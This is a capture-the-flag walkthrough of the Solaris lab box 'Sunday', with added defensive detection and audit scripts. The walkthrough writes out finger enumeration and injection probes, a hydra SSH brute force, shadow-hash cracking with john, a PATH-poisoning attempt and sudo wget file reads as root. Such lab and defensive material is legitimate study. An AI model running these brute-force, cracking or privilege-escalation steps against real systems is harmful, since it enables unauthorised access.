# Enumeration Stage
### NMAP
There is a firewall that is filtering our requests. To bypass it I have run the script with the -sS and -A flags.
1. -sS (TCP SYN scan)
From the Nmap reference guide: SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms. This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection, and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a non-listener. If no response is received after several retransmissions, the port is marked as filtered. The port is also marked filtered if an ICMP unreachable error is received. The port is also considered open if a SYN packet (without the ACK flag) is received in response, which is due to a rare TCP feature known as a simultaneous open or split handshake.
TCP connect scan (-sT) is the default TCP scan type when SYN scan is not an option.
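The half-open behaviour described above is also what a defender sees on the wire: one source sends SYNs to many ports and never sends the ACK that would complete a handshake. The following is an added example (not part of the original writeup) that applies that observation as detection logic over constructed packet records; the record format, the `10.10.14.9` client and the traffic volumes are all assumptions made up for the example, not output of any real capture tool.

```python
"""Half-open (SYN) scan detection over constructed packet records.

Added example, not part of the original writeup. It looks at the half-open
behaviour described above from the defender's side: a scanner sends SYNs to
many ports and never sends the final ACK, so per source address the number
of SYN-probed ports that never completed a handshake grows large.
The record format and sample traffic are constructed for this example.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# (src_ip, dst_ip, dst_port, tcp_flags) with flags as letters: S=SYN, A=ACK, R=RST
Packet = Tuple[str, str, int, str]

# Constructed traffic: 10.10.14.4 probes 200 ports on the target, the two
# listening ports answer SYN/ACK and the scanner tears them down with RST;
# 10.10.14.9 is a normal client completing a handshake to 22022.
SAMPLE_PACKETS: List[Packet] = (
    [("10.10.14.4", "10.10.10.76", port, "S") for port in range(1, 201)]
    + [("10.10.10.76", "10.10.14.4", 79, "SA"), ("10.10.10.76", "10.10.14.4", 111, "SA")]
    + [("10.10.14.4", "10.10.10.76", 79, "R"), ("10.10.14.4", "10.10.10.76", 111, "R")]
    + [("10.10.14.9", "10.10.10.76", 22022, "S"),
       ("10.10.10.76", "10.10.14.9", 22022, "SA"),
       ("10.10.14.9", "10.10.10.76", 22022, "A")]
)


def detect_half_open_scans(packets: Iterable[Packet], threshold: int = 20) -> Dict[str, Dict[str, int]]:
    """Return {source_ip: counters} for sources with >= threshold half-open probes.

    A probe is a bare SYN (S without A). It counts as completed only if the
    same source later sends a bare ACK to the same destination and port,
    which is the third leg of the handshake a SYN scan never sends.
    """
    probed: Dict[str, Set[Tuple[str, int]]] = defaultdict(set)
    completed: Dict[str, Set[Tuple[str, int]]] = defaultdict(set)
    for src, dst, port, flags in packets:
        if "S" in flags and "A" not in flags:
            probed[src].add((dst, port))
        elif flags == "A":
            completed[src].add((dst, port))
    alerts: Dict[str, Dict[str, int]] = {}
    for src, targets in probed.items():
        half_open = targets - completed[src]
        if len(half_open) >= threshold:
            alerts[src] = {"syn_probes": len(targets), "half_open": len(half_open)}
    return alerts


if __name__ == "__main__":
    for src, counters in detect_half_open_scans(SAMPLE_PACKETS).items():
        print(f"possible SYN scan from {src}: {counters}")
```

The threshold is the only tunable: a legitimate client touches one or two ports and completes the handshake, so it never accumulates half-open probes, while a full-range scan like the `-p-` run below accumulates thousands.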
The service scan reveals five open ports.
```bash
# nmap -p- 10.10.10.76 -sV -sC -T4
PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open  unknown
44273/tcp open  rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
```
### Port 79/tcp finger
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
[This website(hacktricks.xyz)](https://book.hacktricks.xyz/pentesting/pentesting-finger) reveals **really** cool information on the service and ways to exploit it.
```bash
# finger @10.10.10.76
Login       Name               TTY         Idle    When    Where
xvm         xVM User                         < .  .  .  . >
openldap    OpenLDAP User                    < .  .  .  . >
nobody      NFS Anonymous Access             < .  .  .  . >
noaccess    No Access User                   < .  .  .  . >
nobody4     SunOS 4.x NFS Anonym             < .  .  .  . >
```
###### metasploit finger user enumeration
We have already enumerated some users but it doesn't hurt to try the metasploit module too. From the output we understand that there is a mysql user too.
```bash
msf6 auxiliary(scanner/finger/finger_users) > run
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sunny
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: adm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: lp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: uucp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nuucp
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dladm
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: listen
[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: bin
[+] 10.10.10.76:79 - 10.10.10.76:79 Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*] 10.10.10.76:79 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
###### Command injection test
```bash
# finger "/bin/ls -a /@10.10.10.76"
Login       Name               TTY         Idle    When    Where
/bin/ls               ???
-a                    ???
/                     ???
# finger "|ls@10.10.10.76"
Login       Name               TTY         Idle    When    Where
|ls                   ???
```
### Port 111/tcp portmapper
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on ***Solaris*** hosts) to identify RPC services that are open to direct attack.
You can run ***nmap*** with the ***-sR*** option to identify RPC services listening on high ports if the portmapper is inaccessible.
### Bruteforcing ssh service
Found password "sunday".
```bash
# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://10.10.10.76
[delete]
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found
```
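A hydra run like the one above is loud on the server side: the same source tries the same login many times per second and then, if a guess lands, succeeds immediately afterwards. The following is an added example (not part of the original writeup) that detects both patterns over constructed log lines. The lines are written in OpenSSH syslog format and the year, PIDs, client ports and second attacker address `10.10.14.20` are made up; SunSSH on the target may log differently, so the regular expression is an assumption to adapt.

```python
"""SSH password brute-force detection over constructed sshd log lines.

Added example, not part of the original writeup. Two signals are raised:
  * "bruteforce": >= threshold failed logins for one (source, user) pair
    inside a sliding time window;
  * "success_after_bruteforce": an accepted login for a pair that had a
    burst of failures just before it, i.e. the guess probably landed.
Log format is OpenSSH-style syslog, constructed for this example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List, NamedTuple, Optional, Tuple

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)


class AuthEvent(NamedTuple):
    ts: datetime
    outcome: str  # "Failed" or "Accepted"
    user: str
    src: str


def parse_line(line: str, year: int = 2021) -> Optional[AuthEvent]:
    """Parse one sshd syslog line; syslog omits the year, so it is supplied."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return AuthEvent(ts, m["outcome"], m["user"], m["src"])


def detect_bruteforce(lines: Iterable[str], window_seconds: int = 60,
                      threshold: int = 10) -> List[Dict[str, object]]:
    """Return alerts in the order they fire; one bruteforce alert per (src, user)."""
    failures: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    alerted = set()
    alerts: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # not an auth event, or a format this parser does not know
        key = (ev.src, ev.user)
        recent = failures[key]
        # drop failures that have fallen out of the sliding window
        while recent and (ev.ts - recent[0]).total_seconds() > window_seconds:
            recent.popleft()
        if ev.outcome == "Failed":
            recent.append(ev.ts)
            if len(recent) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({"kind": "bruteforce", "src": ev.src,
                               "user": ev.user, "failures": len(recent)})
        elif len(recent) >= threshold // 2:
            # an accepted login right after a burst of failures
            alerts.append({"kind": "success_after_bruteforce", "src": ev.src,
                           "user": ev.user, "failures": len(recent)})
    return alerts


# Constructed sample: 16 rapid failures for sunny from 10.10.14.4 (a 16-thread
# run), then a success; and two failures plus a success for sammy that stay
# under the threshold.
SAMPLE_LOG: List[str] = [
    f"May 17 11:40:{i // 2:02d} sunday sshd[{1200 + i}]: Failed password for sunny "
    f"from 10.10.14.4 port {40100 + i} ssh2"
    for i in range(16)
] + [
    "May 17 11:40:09 sunday sshd[1290]: Accepted password for sunny from 10.10.14.4 port 40160 ssh2",
    "May 17 11:41:00 sunday sshd[1300]: Failed password for sammy from 10.10.14.20 port 50000 ssh2",
    "May 17 11:41:05 sunday sshd[1301]: Failed password for sammy from 10.10.14.20 port 50001 ssh2",
    "May 17 11:41:07 sunday sshd[1302]: Accepted password for sammy from 10.10.14.20 port 50002 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second signal is the one worth paging on: a burst of failures is noise on any internet-facing host, but a success that follows one means the password was guessed and the account should be treated as compromised.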
# Privilege Escalation
Logging in through ssh using sunny:sunday as username:password.
```bash
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p 22022
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sunny@sunday:~$
```
Weird file:
```bash
sunny@sunday:/tmp$ cat ogl_select253
SUNWtext mesa
NVDAnvda nvidia
```
Path poison attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require a password to run. Upon running it, my guess is that it makes a system call to "id". Therefore I am creating a copy of /bin/bash with the name "id" and exporting the path to that file so it is executed when invoked; therefore root will run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.
```bash
sunny@sunday:/usr/share$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll
sunny@sunday:/usr/share$ sudo /root/troll
testing
uid=0(root) gid=0(root)
sunny@sunday:/tmp/$ cp /bin/bash /tmp/id
sunny@sunday:/tmp/$ chmod 777 id
sunny@sunday:/tmp/$ echo $PATH
/usr/gnu/bin:/usr/bin:/usr/X11/bin:/usr/sbin:/sbin
sunny@sunday:/tmp/$ export PATH=/tmp:$PATH
sunny@sunday:/tmp/$ sudo /root/troll
testing
uid=0(root) gid=0(root)
```
I have discovered a backup shadow file containing sammy's password hash.
```bash
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
```
By using john, I have managed to recover the password from the hash. username:password == sammy:cooldude!
```bash
# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude!        (sammy)
1g 0:00:00:43 DONE (2021-05-17 11:53) 0.02300g/s 4687p/s 4687c/s 4687C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
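The two passages above (the readable shadow.backup and the john run against it) illustrate the same defensive lesson: a copy of the shadow file that any user can read hands out every active account's hash, and sha256crypt at the default 5000 iterations cracks at several thousand guesses per second, as the john status line shows. The following is an added example (not part of the original writeup) that audits a Solaris-style shadow file offline: it classifies each password field, reports which accounts carry crackable hashes and at what cost, and checks whether a backup copy is exposed by its permissions. The sample input is the page's own shadow.backup; the file mode and owner passed to `backup_exposed` are constructed values.

```python
"""Offline audit of a Solaris-style shadow file.

Added example, not part of the original writeup. It parses entries like the
shadow.backup shown above, classifies each password field (locked, no
password, empty, or a crypt(3) hash) and reports the offline-cracking cost
of each hash. Sample input is the page's shadow.backup; the permission
check below uses constructed mode/owner values.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class Finding(NamedTuple):
    user: str
    state: str            # "locked" | "no-password" | "empty" | "hashed"
    algo: Optional[str]   # crypt(3) scheme for hashed entries
    rounds: Optional[int]
    note: str


# crypt(3) $id$ prefixes: (name, default iteration count when none is encoded)
CRYPT_IDS = {
    "1": ("md5crypt", 1000),
    "5": ("sha256crypt", 5000),
    "6": ("sha512crypt", 5000),
    "2a": ("bcrypt", None),
    "2b": ("bcrypt", None),
}


def classify_field(field: str) -> Tuple[str, Optional[str], Optional[int]]:
    """Return (state, algo, rounds) for one shadow password field."""
    if field == "":
        return ("empty", None, None)          # any password is accepted
    if field == "NP":
        return ("no-password", None, None)    # Solaris "no password" marker
    if field.startswith("*") or field.startswith("!"):
        return ("locked", None, None)         # *LK*, *, !, !! and friends
    m = re.match(r"^\$([0-9a-z]+)\$(?:rounds=(\d+)\$)?", field)
    if not m:
        return ("hashed", "descrypt-or-unknown", None)
    ident, explicit_rounds = m.groups()
    algo, default_rounds = CRYPT_IDS.get(ident, (f"unknown(${ident}$)", None))
    rounds = int(explicit_rounds) if explicit_rounds else default_rounds
    return ("hashed", algo, rounds)


def audit_shadow(text: str) -> List[Finding]:
    """One Finding per well-formed shadow line, in file order."""
    findings: List[Finding] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue  # malformed line: skip rather than crash the audit
        user, field = parts[0], parts[1]
        state, algo, rounds = classify_field(field)
        if state == "empty":
            note = "CRITICAL: empty password field, any password is accepted"
        elif state == "hashed":
            if algo in ("md5crypt", "descrypt-or-unknown"):
                note = "HIGH: legacy hash, fast to crack offline"
            elif rounds is not None and rounds <= 5000:
                note = "MEDIUM: default iteration count, cracks at thousands of guesses/s"
            else:
                note = "OK: modern hash with raised cost"
        else:
            note = "INFO: not usable for password login"
        findings.append(Finding(user, state, algo, rounds, note))
    return findings


def backup_exposed(mode: int, owner_uid: int) -> bool:
    """A shadow copy is exposed if anyone but root can read it."""
    return owner_uid != 0 or (mode & 0o077) != 0


# The page's shadow.backup, verbatim.
SHADOW_BACKUP = """mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

if __name__ == "__main__":
    for f in audit_shadow(SHADOW_BACKUP):
        print(f"{f.user:10} {f.state:12} {f.algo or '-':14} {f.note}")
    # constructed: world-readable backup owned by root, as a low-privileged user could read it
    print("backup exposed:", backup_exposed(0o644, 0))
```

Only two of the ten accounts matter to an attacker who reads this file: sammy and sunny are the only ones with real hashes, and both sit at the sha256crypt default cost, which is why a rockyou run finishes in under a minute above. Raising the iteration count (or moving to sha512crypt with `rounds=`) slows that down; keeping backups of shadow at mode 0600 and owned by root removes the input entirely.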
Changing user to sammy. I once again tested the mandatory "sudo -l" command and received a ***NOPASSWD*** for ***/usr/bin/wget***. According to [GTFOBins](https://gtfobins.github.io/gtfobins/wget/) we can escalate privileges by downloading our own file and saving it to our victim (such as shadow) or simply use wget to read out files.
```bash
sunny@sunday:/tmp$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
sunny@sunday:/tmp$ LFILE=/root/root.txt
sunny@sunday:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.
sunny@sunday:/tmp$
```
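Both escalation attempts in this section come down to sudo configuration: the PATH-poison attempt against /root/troll can only work if the script resolves commands through the caller's $PATH and sudo does not reset it, and the wget rule works because a NOPASSWD grant on a tool that takes file arguments (`-i /root/root.txt` above) is in effect a grant to read files as root. The writeup never shows why the first attempt failed or what /root/troll contains, so the following added example (not part of the original writeup) audits constructed sudoers text and a hypothetical troll script body for exactly those two conditions. The sudoers lines reproduce the two `sudo -l` results from the page; the script body, the `secure_path` value in the hardened variant, and the `curl`/`tar` entries in the tool list are assumptions.

```python
"""Audit of NOPASSWD sudo rules and the scripts they point at.

Added example, not part of the original writeup. Two checks:
  1. A privileged script that calls commands by bare name ('id' rather than
     '/usr/bin/id') resolves them via $PATH; unless sudoers sets secure_path
     or the script sets PATH itself, the caller controls what runs as root.
  2. A NOPASSWD rule on a tool whose normal options read or write arbitrary
     files (wget -i above) is a file-access grant, not a download grant.
All inputs are constructed; the /root/troll body is hypothetical.
"""
import re
import shlex
from typing import Dict, List

# Only wget comes from the page; curl and tar are added as commonly abused peers.
FILE_ACCESS_TOOLS = {"wget", "curl", "tar"}
SHELL_BUILTINS = {"echo", "exit", "cd", "export", "set", "if", "then", "else", "elif",
                  "fi", "for", "while", "do", "done", "test", "[", "read", "return"}
COMMAND_SEPARATORS = {"|", "||", "&&", ";", "&"}
SUDOERS_RULE = re.compile(
    r"^(?P<who>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")
PATH_ASSIGNMENT = re.compile(r"^\s*(?:export\s+)?PATH=", re.M)


def bare_commands(script: str) -> List[str]:
    """Command names the script resolves through $PATH (not builtins, not absolute)."""
    bare: List[str] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        try:
            tokens = list(lexer)
        except ValueError:
            tokens = line.split()  # unbalanced quotes: fall back to a crude split
        expect_command = True
        for tok in tokens:
            if tok in COMMAND_SEPARATORS:
                expect_command = True
                continue
            if not expect_command:
                continue
            if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", tok):
                continue  # leading VAR=value; the command name follows
            expect_command = False
            if tok in SHELL_BUILTINS or tok.startswith("/"):
                continue
            bare.append(tok)
    return bare


def audit_sudoers(sudoers: str, scripts: Dict[str, str]) -> List[str]:
    """Findings for NOPASSWD rules; `scripts` maps rule targets to their file contents."""
    findings: List[str] = []
    secure_path = re.search(r"^\s*Defaults\b.*\bsecure_path\s*=", sudoers, re.M) is not None
    if not secure_path:
        findings.append("sudoers: no secure_path, the caller's $PATH reaches privileged commands")
    for line in sudoers.splitlines():
        m = SUDOERS_RULE.match(line.strip())
        if not m or "NOPASSWD" not in m["tags"]:
            continue
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if name in FILE_ACCESS_TOOLS:
                findings.append(f"{m['who']}: NOPASSWD {cmd} reads/writes arbitrary files as {m['runas']}")
            body = scripts.get(cmd)
            if body is None:
                continue
            bare = bare_commands(body)
            if bare and not secure_path and not PATH_ASSIGNMENT.search(body):
                findings.append(f"{m['who']}: NOPASSWD {cmd} calls {', '.join(bare)} via $PATH (hijackable)")
    return findings


# Constructed: the two 'sudo -l' results from the page, with no secure_path.
SUDOERS_SUNDAY = """sunny ALL=(root) NOPASSWD: /root/troll
sammy ALL=(root) NOPASSWD: /usr/bin/wget
"""
# Constructed hardened variant: secure_path set, wget requires a password.
SUDOERS_HARDENED = """Defaults secure_path="/usr/sbin:/usr/bin:/sbin:/bin"
sunny ALL=(root) NOPASSWD: /root/troll
sammy ALL=(root) PASSWD: /usr/bin/wget
"""
# Hypothetical /root/troll body; the real one is never shown in the writeup.
TROLL_SCRIPT = """#!/bin/sh
echo testing
id
"""
TROLL_HARDENED = """#!/bin/sh
PATH=/usr/bin:/bin
echo testing
/usr/bin/id
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS_SUNDAY, {"/root/troll": TROLL_SCRIPT}):
        print(finding)
```

Run against the constructed Sunday configuration the audit reports three findings (missing secure_path, a PATH-dependent troll script, and the wget file-access grant); against the hardened variant it reports none, which is the configuration the attempts above would have had to defeat.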